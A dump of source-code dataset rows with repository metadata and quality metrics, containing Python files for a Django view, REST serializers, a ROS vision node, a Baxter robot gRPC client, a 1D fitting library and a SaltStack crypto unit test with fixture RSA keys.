hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
82a5daea9d746a5e0fd1a18fd73ba8a7a242e08f | 612 | py | Python | web_app/cornwall/views.py | blackradley/heathmynd | 4495f8fadef9d3a36a7d5b49fae2b61cceb158bc | [
"MIT"
] | null | null | null | web_app/cornwall/views.py | blackradley/heathmynd | 4495f8fadef9d3a36a7d5b49fae2b61cceb158bc | [
"MIT"
] | 4 | 2018-11-06T16:15:10.000Z | 2018-11-07T12:03:09.000Z | web_app/cornwall/views.py | blackradley/heathmynd | 4495f8fadef9d3a36a7d5b49fae2b61cceb158bc | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
""" test """
from __future__ import unicode_literals
from django.template.loader import get_template
from django.contrib import messages
# Create your views here.
from django.http import HttpResponse
def index(request):
""" index """
template = get_template('cornwall/index.html')
messages.set_level(request, messages.DEBUG)
list(messages.get_messages(request))# clear out the previous messages
messages.add_message(request, messages.INFO, 'Hello world.')
context = {'nbar': 'cornwall'}
html = template.render(context, request)
return HttpResponse(html)
| 32.210526 | 73 | 0.730392 | 75 | 612 | 5.826667 | 0.573333 | 0.06865 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001927 | 0.151961 | 612 | 18 | 74 | 34 | 0.840077 | 0.148693 | 0 | 0 | 0 | 0 | 0.08498 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0.333333 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
82b549e4607fd2be9e74cf5b94bf6e0c4162ac8a | 1,198 | py | Python | src/user_auth_api/serializers.py | Adstefnum/mockexams | af5681b034334be9c5aaf807161ca80a8a1b9948 | [
"BSD-3-Clause"
] | null | null | null | src/user_auth_api/serializers.py | Adstefnum/mockexams | af5681b034334be9c5aaf807161ca80a8a1b9948 | [
"BSD-3-Clause"
] | null | null | null | src/user_auth_api/serializers.py | Adstefnum/mockexams | af5681b034334be9c5aaf807161ca80a8a1b9948 | [
"BSD-3-Clause"
] | null | null | null | from rest_framework import serializers
from user_auth_api.models import User
# User Serializer
class UserSerializer(serializers.ModelSerializer):
class Meta:
model = User
fields = [
'user_name',
'email',
'current_jamb_score',
'phone_num',
'last_name',
'first_name',
'is_staff',
'is_superuser',
'uuid',
'is_active',
'last_login',
'date_joined',
]
# Register Serializer
class RegisterSerializer(serializers.ModelSerializer):
class Meta:
model = User
fields = [
'user_name',
'email',
'password',
'current_jamb_score',
'phone_num',
'last_name',
'first_name',
'uuid',
]
extra_kwargs = {'password': {'write_only': True}}
def create(self, validated_data):
user = User.objects.create_user(
validated_data['user_name'],
validated_data['email'],validated_data['current_jamb_score'],
validated_data['phone_num'],validated_data['password'],
validated_data['last_name'],validated_data['first_name']
)
return user | 22.603774 | 73 | 0.576795 | 116 | 1,198 | 5.637931 | 0.413793 | 0.159021 | 0.073395 | 0.107034 | 0.318043 | 0.318043 | 0.318043 | 0.318043 | 0.318043 | 0.192661 | 0 | 0 | 0.310518 | 1,198 | 53 | 74 | 22.603774 | 0.791768 | 0.029215 | 0 | 0.487805 | 0 | 0 | 0.234281 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.02439 | false | 0.073171 | 0.04878 | 0 | 0.195122 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
82b593a5d04b8635ad9d0bfca619ad7a94f582c9 | 2,671 | py | Python | cv_utils/cv_util_node.py | OAkyildiz/cibr_img_processing | 69f3293db80e9c0ae57369eaf2885b94adb330df | [
"MIT"
] | null | null | null | cv_utils/cv_util_node.py | OAkyildiz/cibr_img_processing | 69f3293db80e9c0ae57369eaf2885b94adb330df | [
"MIT"
] | null | null | null | cv_utils/cv_util_node.py | OAkyildiz/cibr_img_processing | 69f3293db80e9c0ae57369eaf2885b94adb330df | [
"MIT"
] | null | null | null | import sys
import rospy
import types
#from std_msgs.msg import String
from sensor_msgs.msg import Image
from cibr_img_processing.msg import Ints
from cv_bridge import CvBridge, CvBridgeError
#make int msgs
#TODO: get the img size from camera_indo topics
class CVUtilNode: # abstarct this, it can easily work with other cv_utils and be an image bbm_node
def __init__(self, util, name="cv_util_node", pub_topic=False):
#self.obj_pub = rospy.Publisher("image_topic_2", ***)
self.bridge = CvBridge()
self.util=util
self.name=name
rospy.init_node(self.name, anonymous=True)
self.rate=rospy.Rate(30)
self.image_sub = rospy.Subscriber("image_topic", Image, self.callback)
self.result_pub = rospy.Publisher("results", Ints, queue_size=10) #always publish data
self.result_msgs = [-1,-1,-1] #make int msgs
self.pubs=lambda:0
self.subs=[]
if pub_topic:
self.image_pub = rospy.Publisher(pub_topic,Image, queue_size=10)
pass #do stuff with img.pub
def callback(self,data):
try:
self.util.hook(self.bridge.imgmsg_to_cv2(data, "bgr8"))
except CvBridgeError as e:
print(e)
def data_pub(self):
self.result_pub.publish(self.util.results) #try catch
def img_pub(cv_image): # to handleconverting from OpenCV to ROS
try:
self.image_pub.publish(self.bridge.cv2_to_imgmsg(cv_image, "bgr8"))
except CvBridgeError as e:
print(e)
def run(self):
self.util.init_windows()
while not rospy.is_shutdown():
try:
if self.util.loop(): break
if not -1 in self.util.results and self.util._publish:
self.data_pub()
self.util._publish = 0
# if self.util._publish:
# for pub in self.pubs:
# pub.publish
#self.rate.sleep()
except KeyboardInterrupt:
self.util.shutdown()
self.util.shutdown()
#adds a publisher to alirlaes,
def attach_pub(self, topic, type):
self.pubs.pub.append(rospy.Publisher(topic, type, queue_size=1))
# TODO:attach structs of publisher and message template instead
# so it is iterable together
#pubs.pub=... pubs.msg=type()
def attach_sub(self, topic, cb_handle):
self.subs.append = rospy.Subscriber(topic, type, cb_handle)
def attach_controls(self, fun_handle):
# bind the method to instance
self.util.external_ops=types.MethodType(fun_handle,self.util)
| 33.810127 | 98 | 0.622613 | 359 | 2,671 | 4.48468 | 0.356546 | 0.069565 | 0.031677 | 0.031056 | 0.043478 | 0.043478 | 0.043478 | 0.043478 | 0 | 0 | 0 | 0.00937 | 0.280794 | 2,671 | 78 | 99 | 34.24359 | 0.828735 | 0.217896 | 0 | 0.18 | 0 | 0 | 0.018357 | 0 | 0 | 0 | 0 | 0.012821 | 0 | 1 | 0.16 | false | 0.02 | 0.12 | 0 | 0.3 | 0.04 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
82e0abe3e486e3352d2b626c47850728c42c4ae5 | 2,719 | py | Python | robot_con/baxter/baxter_client.py | takuya-ki/wrs | f6e1009b94332504042fbde9b39323410394ecde | [
"MIT"
] | 23 | 2021-04-02T09:02:04.000Z | 2022-03-22T05:31:03.000Z | robot_con/baxter/baxter_client.py | takuya-ki/wrs | f6e1009b94332504042fbde9b39323410394ecde | [
"MIT"
] | 35 | 2021-04-12T09:41:05.000Z | 2022-03-26T13:32:46.000Z | robot_con/baxter/baxter_client.py | takuya-ki/wrs | f6e1009b94332504042fbde9b39323410394ecde | [
"MIT"
] | 16 | 2021-03-30T11:55:45.000Z | 2022-03-30T07:10:59.000Z | import robotconn.rpc.baxterrobot.baxter_server_pb2 as bxtsp
import robotconn.rpc.baxterrobot.baxter_server_pb2_grpc as bxtspgc
import grpc
import pickle
import numpy as np
class BaxterClient(object):
def __init__(self, host = "localhost:18300"):
channel = grpc.insecure_channel(host)
self.stub = bxtspgc.BaxterServerStub(channel)
def bxt_set_gripper(self, pos=100, armname = "rgt"):
self.stub.bxt_set_gripper(bxtsp.Gripper_pos_armname(pos=pos,armname=armname))
def bxt_get_gripper(self, armname="rgt"):
return self.stub.bxt_get_gripper(bxtsp.Armname(armname=armname))
def bxt_get_jnts(self, armname="rgt"):
jnts = pickle.loads(self.stub.bxt_get_jnts(bxtsp.Armname(armname=armname)).jnt_angles)
jnts = [jnts["right_s0"],jnts["right_s1"],jnts["right_e0"],jnts["right_e1"],jnts["right_w0"],jnts["right_w1"],jnts["right_w2"]] \
if armname == "rgt" else [jnts["left_s0"],jnts["left_s1"],jnts["left_e0"],jnts["left_e1"],jnts["left_w0"],jnts["left_w1"],jnts["left_w2"]]
jnts = [np.rad2deg(jnt) for jnt in jnts]
return jnts
def bxt_movejnts(self, jnt_angles= [], speed=.5, armname="rgt"):
self.stub.bxt_movejnts(bxtsp.Jnt_angles_armname(jnt_angles = np.array(jnt_angles,dtype="float").tobytes(),speed=speed,armname =armname))
def bxt_movejnts_cont(self, jnt_angles_list =[], speed=.2, armname="rgt"):
self.stub.bxt_movejnts_cont(bxtsp.Jnt_angles_armname(jnt_angles = np.array(jnt_angles_list,dtype="float").tobytes(),speed=speed,armname =armname))
def bxt_get_force(self,armname):
return np.frombuffer(self.stub.bxt_get_force(bxtsp.Armname(armname=armname)).list).tolist()
def bxt_get_image(self,camera_name):
image = self.stub.bxt_get_image(bxtsp.Camera_name(name=camera_name)).list
image = np.frombuffer(image)
image = np.reshape(image,(200,320,3)).astype("uint8")
# image = image[:,:,1]
return image
if __name__=="__main__":
import time
bc = BaxterClient(host = "10.1.0.24:18300")
# tic = time.time()
# imgx = hcc.getimgbytes()
# toc = time.time()
# td = toc-tic
# tic = time.time()
# imgxs = hcc.getimgstr()
# toc = time.time()
# td2 = toc-tic
# print(td, td2)
angle_rgt = bc.bxt_get_jnts("rgt")
# print angle_rgt
# print(angle_rgt[-1])
#
#
# angle_rgt[-1] = angle_rgt[-1] - 50.0
#
# bc.bxt_movejnts(angle_rgt)
print(bc.bxt_get_jnts(armname="rgt"))
print(bc.bxt_get_jnts(armname="lft"))
import cv2 as cv
cv.imshow("w",bc.bxt_get_image("head_camera"))
cv.waitKey(0)
# print bc.bxt_get_jnts("rgt")
# print(eval("a="+bc.bxt_get_jnts())) | 38.842857 | 154 | 0.668996 | 397 | 2,719 | 4.34005 | 0.261965 | 0.048752 | 0.04469 | 0.034823 | 0.306442 | 0.262914 | 0.190366 | 0.107951 | 0.107951 | 0.053395 | 0 | 0.025367 | 0.173593 | 2,719 | 70 | 155 | 38.842857 | 0.741433 | 0.128724 | 0 | 0 | 0 | 0 | 0.08383 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.205128 | false | 0 | 0.179487 | 0.051282 | 0.512821 | 0.051282 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
82e4981e82370f4b216afc9af7f4136625ccd93f | 3,644 | py | Python | fit1d/common/fit1d.py | michael-amat/fit1d | 0cd42874e3eba4353c564809c317510b626dee25 | [
"BSD-2-Clause"
] | null | null | null | fit1d/common/fit1d.py | michael-amat/fit1d | 0cd42874e3eba4353c564809c317510b626dee25 | [
"BSD-2-Clause"
] | null | null | null | fit1d/common/fit1d.py | michael-amat/fit1d | 0cd42874e3eba4353c564809c317510b626dee25 | [
"BSD-2-Clause"
] | 9 | 2019-02-24T12:51:28.000Z | 2019-03-22T09:25:45.000Z | """
fit1d package is designed to provide an organized toolbox for different types of
1D fits that can be performed.
It is easy to add new fits and other functionalities
"""
from abc import ABC, abstractmethod
import numpy as np
from typing import List,Tuple
from fit1d.common.model import Model, ModelMock
from fit1d.common.outlier import OutLier
from fit1d.common.fit_data import FitData
class Fit1D(ABC):
"""
This is the main class of the fit1d package. It is used to allow the user to execute
fit and eval methods, in addition to calc_RMS and calc_error static services.
The properties of this class are the _model and _outlier objects and a _use_remove_outliers
boolean
"""
_outlier: OutLier
_use_remove_outliers: bool
_fit_data: FitData
# interface methods
def fit(self, x: np.ndarray, y: np.ndarray) -> FitData:
self._fit_data.x = x
self._fit_data.y = y
if self._use_remove_outliers:
self._remove_outlier()
else:
self._calc_fit_and_update_fit_data()
return self._fit_data
def eval(self, x: np.ndarray = None, model: Model = None) -> np.ndarray:
if x is not None:
self._fit_data.x = x
if model is not None:
self._fit_data.model = model
self._calc_eval()
return self._fit_data.y_fit
def calc_error(self):
"""
calc error vector , update _fit_data
:return:
"""
if self._fit_data.y is not None and self._fit_data.y_fit is not None:
self._fit_data.error_vector = self._fit_data.y - self._fit_data.y_fit
def calc_rms(self):
if self._fit_data.error_vector is not None:
self._fit_data.rms = (sum(self._fit_data.error_vector ** 2) / len(self._fit_data.error_vector)) ** 0.5
def get_fit_data(self) -> FitData:
return self._fit_data
# abstract methods
@abstractmethod
def _calc_fit(self):
"""
abstractmethod:
run fit calculation of the data update model in _fit_data.model
:return: Null
"""
pass
@abstractmethod
def _calc_eval(self):
"""
abstractmethod:
subclass calculate model eval for inner x and model
update _fit_data.y_fit
:return: Void
"""
pass
# internal methods
def _update_fit_data(self):
self._calc_eval()
self.calc_error()
self.calc_rms()
def _remove_outlier(self):
while True:
self._calc_fit_and_update_fit_data()
indexes_to_remove = self._outlier.find_outliers(self._fit_data.error_vector)
if len(indexes_to_remove) == 0:
break
else:
self._remove_indexes(indexes_to_remove)
def _remove_indexes(self, ind):
self._fit_data.x = np.delete(self._fit_data.x, ind)
self._fit_data.y = np.delete(self._fit_data.y, ind)
def _calc_fit_and_update_fit_data(self):
self._calc_fit()
self._update_fit_data()
class Fit1DMock(Fit1D):
""" Mock class. Used only for tests """
def __init__(self, outlier: OutLier, remove_outliers: bool):
self._fit_data = FitData()
self._outlier = outlier
self._use_remove_outliers = remove_outliers
def _calc_fit(self):
self._fit_data.model = ModelMock({"param1": 5.5})
def _calc_eval(self) -> np.ndarray:
if self._fit_data.y is None or len(self._fit_data.y) == 4:
self._fit_data.y_fit = np.array([11, 22, 33, 44])
else:
self._fit_data.y_fit = np.array([11, 33, 44])
| 30.366667 | 114 | 0.638035 | 518 | 3,644 | 4.183398 | 0.227799 | 0.12275 | 0.137056 | 0.066451 | 0.223812 | 0.146747 | 0.067374 | 0.02215 | 0 | 0 | 0 | 0.011751 | 0.27607 | 3,644 | 119 | 115 | 30.621849 | 0.809704 | 0.208013 | 0 | 0.246377 | 0 | 0 | 0.002202 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.202899 | false | 0.028986 | 0.086957 | 0.014493 | 0.405797 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7d53f22522d63caa5e1b6eeef4ed280bfe59205b | 5,646 | py | Python | tests/unit/test_crypt.py | oba11/salt | ddc0286d57c5ce864b60bf43e5bc3007bf7c2549 | [
"Apache-2.0"
] | null | null | null | tests/unit/test_crypt.py | oba11/salt | ddc0286d57c5ce864b60bf43e5bc3007bf7c2549 | [
"Apache-2.0"
] | null | null | null | tests/unit/test_crypt.py | oba11/salt | ddc0286d57c5ce864b60bf43e5bc3007bf7c2549 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
# python libs
from __future__ import absolute_import
import os
# salt testing libs
from tests.support.unit import TestCase, skipIf
from tests.support.mock import patch, call, mock_open, NO_MOCK, NO_MOCK_REASON, MagicMock
# salt libs
import salt.utils
import salt.utils.files
from salt import crypt
# third-party libs
try:
from Cryptodome.PublicKey import RSA # pylint: disable=unused-import
HAS_PYCRYPTO_RSA = True
except ImportError:
HAS_PYCRYPTO_RSA = False
if not HAS_PYCRYPTO_RSA:
try:
from Crypto.PublicKey import RSA
HAS_PYCRYPTO_RSA = True
except ImportError:
HAS_PYCRYPTO_RSA = False
PRIVKEY_DATA = (
'-----BEGIN RSA PRIVATE KEY-----\n'
'MIIEpAIBAAKCAQEA75GR6ZTv5JOv90Vq8tKhKC7YQnhDIo2hM0HVziTEk5R4UQBW\n'
'a0CKytFMbTONY2msEDwX9iA0x7F5Lgj0X8eD4ZMsYqLzqjWMekLC8bjhxc+EuPo9\n'
'Dygu3mJ2VgRC7XhlFpmdo5NN8J2E7B/CNB3R4hOcMMZNZdi0xLtFoTfwU61UPfFX\n'
'14mV2laqLbvDEfQLJhUTDeFFV8EN5Z4H1ttLP3sMXJvc3EvM0JiDVj4l1TWFUHHz\n'
'eFgCA1Im0lv8i7PFrgW7nyMfK9uDSsUmIp7k6ai4tVzwkTmV5PsriP1ju88Lo3MB\n'
'4/sUmDv/JmlZ9YyzTO3Po8Uz3Aeq9HJWyBWHAQIDAQABAoIBAGOzBzBYZUWRGOgl\n'
'IY8QjTT12dY/ymC05GM6gMobjxuD7FZ5d32HDLu/QrknfS3kKlFPUQGDAbQhbbb0\n'
'zw6VL5NO9mfOPO2W/3FaG1sRgBQcerWonoSSSn8OJwVBHMFLG3a+U1Zh1UvPoiPK\n'
'S734swIM+zFpNYivGPvOm/muF/waFf8tF/47t1cwt/JGXYQnkG/P7z0vp47Irpsb\n'
'Yjw7vPe4BnbY6SppSxscW3KoV7GtJLFKIxAXbxsuJMF/rYe3O3w2VKJ1Sug1VDJl\n'
'/GytwAkSUer84WwP2b07Wn4c5pCnmLslMgXCLkENgi1NnJMhYVOnckxGDZk54hqP\n'
'9RbLnkkCgYEA/yKuWEvgdzYRYkqpzB0l9ka7Y00CV4Dha9Of6GjQi9i4VCJ/UFVr\n'
'UlhTo5y0ZzpcDAPcoZf5CFZsD90a/BpQ3YTtdln2MMCL/Kr3QFmetkmDrt+3wYnX\n'
'sKESfsa2nZdOATRpl1antpwyD4RzsAeOPwBiACj4fkq5iZJBSI0bxrMCgYEA8GFi\n'
'qAjgKh81/Uai6KWTOW2kX02LEMVRrnZLQ9VPPLGid4KZDDk1/dEfxjjkcyOxX1Ux\n'
'Klu4W8ZEdZyzPcJrfk7PdopfGOfrhWzkREK9C40H7ou/1jUecq/STPfSOmxh3Y+D\n'
'ifMNO6z4sQAHx8VaHaxVsJ7SGR/spr0pkZL+NXsCgYEA84rIgBKWB1W+TGRXJzdf\n'
'yHIGaCjXpm2pQMN3LmP3RrcuZWm0vBt94dHcrR5l+u/zc6iwEDTAjJvqdU4rdyEr\n'
'tfkwr7v6TNlQB3WvpWanIPyVzfVSNFX/ZWSsAgZvxYjr9ixw6vzWBXOeOb/Gqu7b\n'
'cvpLkjmJ0wxDhbXtyXKhZA8CgYBZyvcQb+hUs732M4mtQBSD0kohc5TsGdlOQ1AQ\n'
'McFcmbpnzDghkclyW8jzwdLMk9uxEeDAwuxWE/UEvhlSi6qdzxC+Zifp5NBc0fVe\n'
'7lMx2mfJGxj5CnSqQLVdHQHB4zSXkAGB6XHbBd0MOUeuvzDPfs2voVQ4IG3FR0oc\n'
'3/znuwKBgQChZGH3McQcxmLA28aUwOVbWssfXKdDCsiJO+PEXXlL0maO3SbnFn+Q\n'
'Tyf8oHI5cdP7AbwDSx9bUfRPjg9dKKmATBFr2bn216pjGxK0OjYOCntFTVr0psRB\n'
'CrKg52Qrq71/2l4V2NLQZU40Dr1bN9V+Ftd9L0pvpCAEAWpIbLXGDw==\n'
'-----END RSA PRIVATE KEY-----')
PUBKEY_DATA = (
'-----BEGIN PUBLIC KEY-----\n'
'MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA75GR6ZTv5JOv90Vq8tKh\n'
'KC7YQnhDIo2hM0HVziTEk5R4UQBWa0CKytFMbTONY2msEDwX9iA0x7F5Lgj0X8eD\n'
'4ZMsYqLzqjWMekLC8bjhxc+EuPo9Dygu3mJ2VgRC7XhlFpmdo5NN8J2E7B/CNB3R\n'
'4hOcMMZNZdi0xLtFoTfwU61UPfFX14mV2laqLbvDEfQLJhUTDeFFV8EN5Z4H1ttL\n'
'P3sMXJvc3EvM0JiDVj4l1TWFUHHzeFgCA1Im0lv8i7PFrgW7nyMfK9uDSsUmIp7k\n'
'6ai4tVzwkTmV5PsriP1ju88Lo3MB4/sUmDv/JmlZ9YyzTO3Po8Uz3Aeq9HJWyBWH\n'
'AQIDAQAB\n'
'-----END PUBLIC KEY-----')
MSG = b'It\'s me, Mario'
SIG = (
b'\x07\xf3\xb1\xe7\xdb\x06\xf4_\xe2\xdc\xcb!F\xfb\xbex{W\x1d\xe4E'
b'\xd3\r\xc5\x90\xca(\x05\x1d\x99\x8b\x1aug\x9f\x95>\x94\x7f\xe3+'
b'\x12\xfa\x9c\xd4\xb8\x02]\x0e\xa5\xa3LL\xc3\xa2\x8f+\x83Z\x1b\x17'
b'\xbfT\xd3\xc7\xfd\x0b\xf4\xd7J\xfe^\x86q"I\xa3x\xbc\xd3$\xe9M<\xe1'
b'\x07\xad\xf2_\x9f\xfa\xf7g(~\xd8\xf5\xe7\xda-\xa3Ko\xfc.\x99\xcf'
b'\x9b\xb9\xc1U\x97\x82\'\xcb\xc6\x08\xaa\xa0\xe4\xd0\xc1+\xfc\x86'
b'\r\xe4y\xb1#\xd3\x1dS\x96D28\xc4\xd5\r\xd4\x98\x1a44"\xd7\xc2\xb4'
b']\xa7\x0f\xa7Db\x85G\x8c\xd6\x94!\x8af1O\xf6g\xd7\x03\xfd\xb3\xbc'
b'\xce\x9f\xe7\x015\xb8\x1d]AHK\xa0\x14m\xda=O\xa7\xde\xf2\xff\x9b'
b'\x8e\x83\xc8j\x11\x1a\x98\x85\xde\xc5\x91\x07\x84!\x12^4\xcb\xa8'
b'\x98\x8a\x8a&#\xb9(#?\x80\x15\x9eW\xb5\x12\xd1\x95S\xf2<G\xeb\xf1'
b'\x14H\xb2\xc4>\xc3A\xed\x86x~\xcfU\xd5Q\xfe~\x10\xd2\x9b')
@skipIf(NO_MOCK, NO_MOCK_REASON)
@skipIf(not HAS_PYCRYPTO_RSA, 'pycrypto >= 2.6 is not available')
class CryptTestCase(TestCase):
def test_gen_keys(self):
with patch.multiple(os, umask=MagicMock(), chmod=MagicMock(), chown=MagicMock,
access=MagicMock(return_value=True)):
with patch('salt.utils.files.fopen', mock_open()):
open_priv_wb = call('/keydir/keyname.pem', 'wb+')
open_pub_wb = call('/keydir/keyname.pub', 'wb+')
with patch('os.path.isfile', return_value=True):
self.assertEqual(crypt.gen_keys('/keydir', 'keyname', 2048), '/keydir/keyname.pem')
self.assertNotIn(open_priv_wb, salt.utils.files.fopen.mock_calls)
self.assertNotIn(open_pub_wb, salt.utils.files.fopen.mock_calls)
with patch('os.path.isfile', return_value=False):
with patch('salt.utils.files.fopen', mock_open()):
crypt.gen_keys('/keydir', 'keyname', 2048)
salt.utils.files.fopen.assert_has_calls([open_priv_wb, open_pub_wb], any_order=True)
def test_sign_message(self):
key = RSA.importKey(PRIVKEY_DATA)
with patch('salt.crypt._get_rsa_key', return_value=key):
self.assertEqual(SIG, salt.crypt.sign_message('/keydir/keyname.pem', MSG))
def test_verify_signature(self):
with patch('salt.utils.files.fopen', mock_open(read_data=PUBKEY_DATA)):
self.assertTrue(crypt.verify_signature('/keydir/keyname.pub', MSG, SIG))
| 49.526316 | 108 | 0.732554 | 620 | 5,646 | 6.56129 | 0.504839 | 0.017699 | 0.02409 | 0.028024 | 0.106686 | 0.097837 | 0.083579 | 0.053097 | 0.026549 | 0.026549 | 0 | 0.10547 | 0.145236 | 5,646 | 113 | 109 | 49.964602 | 0.737464 | 0.017712 | 0 | 0.106383 | 0 | 0.031915 | 0.571403 | 0.514353 | 0 | 0 | 0 | 0 | 0.06383 | 1 | 0.031915 | false | 0 | 0.12766 | 0 | 0.170213 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7d55cd544a02e7f8eda686f396f1e614dce7adb0 | 11,660 | py | Python | msg/tools/genmsg/test/test_genmsg_msgs.py | sikuner/Firmware_Marine | 80411dc4eb5aa9dc8eb3ca8ff6d59d1cf081a010 | [
"BSD-3-Clause"
